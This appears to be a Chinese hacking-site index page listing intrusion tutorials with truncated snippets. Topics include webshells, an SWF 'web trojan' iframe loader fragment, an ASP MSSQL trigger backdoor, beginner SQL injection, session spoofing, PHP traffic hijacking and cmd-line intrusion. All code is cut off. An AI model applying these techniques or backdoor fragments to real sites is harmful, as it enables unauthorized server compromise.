webshell 就是web上面的操作界面(shell),简单地说,webshell就是你上传到服务器的的大马文件. 拿站 如果一个网站被你控制了(拿到了webshell,或者被你用灰鸽子控制了,但一...
swf 调用网马代码
// Action script...var lcx= "var O = document.createElement(\"iframe\");O.src=\"...
MsSql 触发器后门asp版
复制代码代码如下:<%'里边的变量代码大家用时自己改吧On Error Resume nextSet conn=Server.CreateObject("ADODB.Connection") D...
网络安全
菜鸟玩注入之找后台篇
先把目标网站打开 现在开始找注入点...如图: 然后手工检测 and 1=1 返回信息正常 该点可以注入 恭...
社会工程学的八种常用方法
转自CB,不同意原文使用的”伎俩”一词.社会工程学也是一门科学,是科学就有科学的方法,帮改之为”方法”. 以下是原文: 著名黑客Kevin Mitnic...
菜鸟也学IP的侦察和隐藏
在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。来...
小议session欺骗的利用以及价值
对于session欺骗 大家都蒙了。 百度上有一篇文章 骗了整个网络界 虽然有不少人已经发现是错误的理论 误导的文章 。使不少人觉得 session欺骗很牛x 其实不然那篇文章...
利用php来嗅探劫持服务器数据
前几天刺在我们的maillist发了一个老外写的文章,大意是可以用php来实现数据的劫持和转发。我瞄了一下,确实可行,于是今天抽出了以前用来扯淡的时间,写了段代码验证了一下想法。老外的原文是一个PDF...
Cmd模式下的入侵技术大全
Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。 本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。 文件传...
网络安全的七大误解
许多人对于自己的数据和网络目前有一种虚假的安全感;在边界安装了防火墙、在桌面上安装了防病毒和防间谍软件工具、使用加密技术发送和保存数据;此外,微软及各大安全公司不断增强安全工具和补丁程序&hell...
